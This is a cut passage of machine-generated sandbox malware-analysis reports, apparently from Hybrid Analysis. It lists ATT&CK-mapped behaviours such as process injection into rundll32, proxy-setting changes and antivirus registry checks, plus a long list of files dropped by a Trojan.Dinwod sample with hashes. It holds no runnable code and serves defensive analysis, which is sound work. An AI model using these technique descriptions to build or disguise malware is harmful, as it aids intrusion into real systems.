executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"rundll32.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\system\\rundll32.exe]- [targetUID: 00000000-00005944]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-104", "type": 6, "relevance": 5, "name": "Calls an API typically used to enumerate process encountered in a system snapshot", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"Process32FirstW with parameter [System Process]\" (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"Process32NextW with parameter System\" (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"Process32NextW with parameter smss.exe\" (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"Process32NextW with parameter csrss.exe\" (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"Process32NextW with parameter wininit.exe\" (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"Process32NextW with parameter winlogon.exe\" (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"Process32NextW with parameter services.exe\" (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"Process32NextW with parameter lsass.exe\" (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"Process32NextW with parameter lsm.exe\" (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"Process32NextW with parameter svchost.exe\" (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"Process32NextW with parameter spoolsv.exe\" (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"Process32NextW with parameter dwm.exe\" (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"Process32NextW with parameter explorer.exe\" (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"Process32NextW with parameter taskhost.exe\" (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"Process32NextW with parameter WmiPrvSE.exe\" (UID: 00000000-00005944)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "registry-9", "type": 3, "relevance": 7, "name": "Checks warning level of secure to non-secure traffic redirection", "description": "\"rundll32.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"WARNONHTTPSTOHTTPREDIRECT\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 80 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-22", "type": 7, "relevance": 10, "name": "Uses a browser-related user-agent without launching browser", "description": "Found user-agent(s): Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"rundll32.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"rundll32.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"rundll32.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"PROXYENABLE\"; Value: \"00000000\")\n \"rundll32.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"PROXYSERVER\")\n \"rundll32.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"PROXYOVERRIDE\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" opened \"C:\\Windows\\IEXPLORE.EXE\" with delete access\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" opened \"C:\\Windows\\IEXPLORE .EXE\" with delete access\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" opened \"C:\\Windows\\internat.exe\" with delete access\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" opened \"C:\\Windows\\system32\\IEXPLORE.EXE\" with delete access\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" opened \"C:\\Windows\\system32\\IEXPLORE .EXE\" with delete access\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" opened \"C:\\Windows\\system32\\mssysint.exe\" with delete access\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" opened \"C:\\Windows\\system32\\mspsint.exe\" with delete access\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" opened \"C:\\Windows\\system32\\mspbint.exe\" with delete access\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" opened \"C:\\Windows\\system32\\mspbbase.dll\" with delete access\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" opened \"C:\\Windows\\system32\\mspbhook.dll\" with delete access\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" opened \"C:\\Windows\\system32\\psinthk.dll\" with delete access\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" opened \"C:\\Windows\\system32\\psintbs.dll\" with delete access\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" opened \"C:\\Windows\\system32\\¢®.exe\" with delete access\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" opened \"C:\\Windows\\system32\\notepad¢®.exe\" with delete access\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" opened \"C:\\Windows\\system32\\¢«.exe\" with delete access\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" opened \"C:\\Windows\\system32\\notepad¢¬.exe\" with delete access\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" opened \"C:\\Windows\\INTERNAT.EXE\" with delete access\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" opened \"C:\\Windows\\System32\\IEXPLORE.EXE\" with delete access\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" opened \"C:\\Windows\\System32\\IEXPLORE .EXE\" with delete access\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" opened \"C:\\Windows\\System32\\MSSYSINT.EXE\" with delete access\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" opened \"C:\\Windows\\System32\\MSPSINT.EXE\" with delete access\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" opened \"C:\\Windows\\System32\\MSPBINT.EXE\" with delete access\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" opened \"C:\\Windows\\System32\\MSPBBASE.DLL\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "api-120", "type": 6, "relevance": 10, "name": "Calls an API typically used to run the specified application", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"WinExec\" with parameter %WINDIR%\\system\\rundll32.exe (UID: 00000000-00005944)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" wrote 1500 bytes to a remote process \"C:\\Windows\\system\\rundll32.exe\" (Handle: 172)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\system\\rundll32.exe\" (Handle: 172)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\system\\rundll32.exe\" (Handle: 172)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\system\\rundll32.exe\" (Handle: 172)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" allocated memory in \"C:\\3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "registry-32", "type": 3, "relevance": 8, "name": "Reads Antivirus engine related registry keys", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Path: \"HKLM\\SOFTWARE\\TENCENT\\PLATFORM_TYPE_LIST\\1\")\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Path: \"HKLM\\SOFTWARE\\TENCENT\\QQ\")\n \"rundll32.exe\" (Path: \"HKLM\\SOFTWARE\\TENCENT\\PLATFORM_TYPE_LIST\\1\")\n \"rundll32.exe\" (Path: \"HKLM\\SOFTWARE\\TENCENT\\QQ\")", "origin": "Registry Access", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-269", "type": 9, "relevance": 7, "name": "Windows system process connects to a network", "description": "Process \"rundll32.exe\" connects to <IPv4>:80", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-248", "type": 9, "relevance": 6, "name": "Detected Rundll32 execution with no parameters provided (likely process injection)", "description": "Process \"rundll32.exe\" with commandline \"\" [UID: 00000000-00004384]", "origin": "Monitored Target", "attck_id": "T1218.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218/008"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963
https://hybrid-analysis.com/sample/934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963
Hybrid Analysis - Infostealers
{"size": 341563, "type": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "submit_name": "934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963", "sha256": "934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963", "av_detect": 96, "vx_family": "Trojan.Dinwod", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "The operation completed successfully. (0x0)", "total_processes": 64, "total_signatures": 98, "extracted_files": [{"name": "0002440.exe", "file_path": "C:\\0002440.exe", "file_size": 342099, "sha256": "04af34f93d0723390a15a93c776dbcac52ca4d2e2b7d95ae840d474be56a756d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "0002440.exe (PID: 4404)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "02006.exe", "file_path": "C:\\02006.exe", "file_size": 341614, "sha256": "ce5c20b2343e323d45660934afddf64d2cdeaaff19c71356369d50ee04499bcf", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "02006.exe (PID: 5764)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "0246246.exe", "file_path": "C:\\0246246.exe", "file_size": 342437, "sha256": "0032cc7a76ead21e8de5c402a9714f1f2a34ccfc74d92a8b18aa315f2994a536", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "0246246.exe (PID: 4500)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "026844.exe", "file_path": "C:\\026844.exe", "file_size": 342074, "sha256": "f780f74774f52810e7e00205b75c3401f822f14937a6391f357ab0137ac40863", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "026844.exe (PID: 3988)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "0880828.exe", "file_path": "C:\\0880828.exe", "file_size": 342315, "sha256": "dd0c46ab1a3102048fd1d881f1d560fe6301d2da7b50a1cd9eef6772f46a4f4b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "0880828.exe (PID: 3876)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "20024.exe", "file_path": "C:\\20024.exe", "file_size": 342062, "sha256": "6bd61bdf94a4da91aeed83573861c2f1bc357b9fbfb0ac1f1d8691314ba032f6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "2268206.exe (PID: 4416)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2044406.exe", "file_path": "C:\\2044406.exe", "file_size": 342229, "sha256": "82927323afa269cdf40752c6c233dc2ff58044458b996d2fe2b989ffb2f4da05", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "6020448.exe (PID: 712)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2268206.exe", "file_path": "C:\\2268206.exe", "file_size": 342046, "sha256": "f54dbf306af57774396ec0c02a6fe70a7272b54e8e25e219f9208d76b55fa4e5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "2268206.exe (PID: 4416)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "248486.exe", "file_path": "C:\\248486.exe", "file_size": 341630, "sha256": "1b626ffecfe1c610fba63304711f0cf3b1223e4323c9702acd06dda6476e5a2a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "248486.exe (PID: 4108)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "264846.exe", "file_path": "C:\\264846.exe", "file_size": 342019, "sha256": "aa262a5d3ea5be690296e6288f05137bc6b1f2683b2fe48b0a221644c4eef23b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "264846.exe (PID: 3180)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2686426.exe", "file_path": "C:\\2686426.exe", "file_size": 342349, "sha256": "ef5d9c48f44deccbf4c16124c861b32a5637f2ff4a80dc1d95cb1646cbba5867", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "4804844.exe (PID: 812)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "280844.exe", "file_path": "C:\\280844.exe", "file_size": 342255, "sha256": "d0c93ac4e68e0ff5c648c5c43a6f098f5a87d605ed2a973d471a4900de8ab60e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "280844.exe (PID: 3140)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "282462.exe", "file_path": "C:\\282462.exe", "file_size": 341596, "sha256": "bb46c226d390e9b7fc0bdaf308a88845f176740fb4561bbaf47cb1ae76a90231", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "442800.exe (PID: 6016)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "282866.exe", "file_path": "C:\\282866.exe", "file_size": 342009, "sha256": "a7f84615e3f7836c6420c386f3e1af97f04c47300498da8c0ceffcdad509c68b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "880026.exe (PID: 2380)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "284804.exe", "file_path": "C:\\284804.exe", "file_size": 342476, "sha256": "b8364de66952ef341f386257226a00fb0f686797d18218db873ccf5222cf0b28", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "466842.exe (PID: 3568)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "442800.exe", "file_path": "C:\\442800.exe", "file_size": 341580, "sha256": "8becf5f1ea9e0d1c568e6676991b65676d46a327a78c879b958e5baa576dd15f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe (PID: 6052)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "44828.exe", "file_path": "C:\\44828.exe", "file_size": 341717, "sha256": "9b3c894ad9cc561eec205ec9e598e57676afe1f3339c0ef56e7638e7bf6ede34", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "44828.exe (PID: 6084)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4484802.exe", "file_path": "C:\\4484802.exe", "file_size": 341665, "sha256": "2cf8fd155566cdf60e73c6c90c29e127181567784c4e4792e7134a9f870007ac", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "6002286.exe (PID: 5876)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "466286.exe", "file_path": "C:\\466286.exe", "file_size": 342203, "sha256": "bf121aaf8bcc7cb837bee40619535d8fc14eb481944d4f0807a7a8d559ab393b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "466286.exe (PID: 468)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "466842.exe", "file_path": "C:\\466842.exe", "file_size": 342457, "sha256": "d8f0ae46c558a39ce542299c540a766933fc0cdb7d8b0048fe2942a5ed131a6f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "466842.exe (PID: 3568)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "48022.exe", "file_path": "C:\\48022.exe", "file_size": 342085, "sha256": "13be0b35822871a8d9604241cc4e77e3bf9f6be66e04c73a11fff82fb6ebd585", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "026844.exe (PID: 3988)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4804844.exe", "file_path": "C:\\4804844.exe", "file_size": 342333, "sha256": "3b3e582df7adedda668286ee0a377333bd23bb4da7241201c7dbb89387432a11", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "0880828.exe (PID: 3876)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "6002286.exe", "file_path": "C:\\6002286.exe", "file_size": 341649, "sha256": "e693ffc67430d2ac7a56c8d3f779e1906d95b6bb877f5c8da1bb6e8201c8f78c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "248486.exe (PID: 4108)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "6020448.exe", "file_path": "C:\\6020448.exe", "file_size": 342213, "sha256": "8814ff1a4c91610d524adbe7a4127ae1c739c789572218913f6c553798c94c1b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "466286.exe (PID: 468)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "6022622.exe", "file_path": "C:\\6022622.exe", "file_size": 341878, "sha256": "d43bc0495e17804e5127adcfd4febc5fc3a29bd43bc9ea13ea47dd68b2502754", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "64088.exe (PID: 1072)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "60480.exe", "file_path": "C:\\60480.exe", "file_size": 341680, "sha256": "637d773bf1c8581803daaae2bc2eed9603f70eedf6c8dcfdcd414b7fbfc8d360", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "60480.exe (PID: 6076)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "64088.exe", "file_path": "C:\\64088.exe", "file_size": 341867, "sha256": "9a12a52dd09d2555c5ca2d224bcb6b58a7a6013ca8547b7af92a1b9df07fab3b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "lnvvbl.exe (PID: 3172)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "6440024.exe", "file_path": "C:\\6440024.exe", "file_size": 341975, "sha256": "4dddd02216d1a462e0dd0e070f7696b65d38d71b8714357e60181a14654daa38", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dbjvvrj.exe (PID: 3516)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "646228.exe", "file_path": "C:\\646228.exe", "file_size": 342153, "sha256": "03903bf145448b4b8b09ccdeda4e94812032f42e1247fff0965f60437b02ee0a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "646228.exe (PID: 4436)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "660206.exe", "file_path": "C:\\660206.exe", "file_size": 342243, "sha256": "413c6eae16979315478ed2b30445f75b90bd8052fc235f8c39c44d36bf50edda", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "2044406.exe (PID: 1164)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "66026.exe", "file_path": "C:\\66026.exe", "file_size": 342183, "sha256": "e8b2a3eccce42d42fc797eede04c4daa314c403ec58746bb683e10b8858adfe5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "808828.exe (PID: 2844)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "682088.exe", "file_path": "C:\\682088.exe", "file_size": 341691, "sha256": "c82bc660e94671a3bd2fbcdfc09dbbd5c0f8a495da7356d6b6e10adff27ebda4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "60480.exe (PID: 6076)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "808828.exe", "file_path": "C:\\808828.exe", "file_size": 342167, "sha256": "61c0a49f45394171ba6aeab401934bcd5177ea132689853dbfb249b42ac2db2b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "808828.exe (PID: 2844)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "828406.exe", "file_path": "C:\\828406.exe", "file_size": 342118, "sha256": "6a62cdd8d364328d8b41dd3742b4ba31c56312a4833d1ae13fa51f9ec9aac730", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "0002440.exe (PID: 4404)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "828684.exe", "file_path": "C:\\828684.exe", "file_size": 341705, "sha256": "973e88319d188c1c249d3b5d15bcfbfe63cb60b68d15ce72e2db295ba54ee0c0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "682088.exe (PID: 5900)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "880026.exe", "file_path": "C:\\880026.exe", "file_size": 341991, "sha256": "f70f37a3ba38f8438717eb5f13070d6459e7d5cc29be57979acb8e41f23c29c3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "880026.exe (PID: 2380)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "884020.exe", "file_path": "C:\\884020.exe", "file_size": 342029, "sha256": "8e5d0607f47569f79c08d8b44fb5cf64efd769f13c9082ee74316ac925ff2393", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "264846.exe (PID: 3180)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dbjvvrj.exe", "file_path": "C:\\dbjvvrj.exe", "file_size": 341964, "sha256": "197e65346bdcd4b597505163446fd15dd8846dd76394ecdce50837788ab27fdb", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dbjvvrj.exe (PID: 3516)", "threat_level_readable": 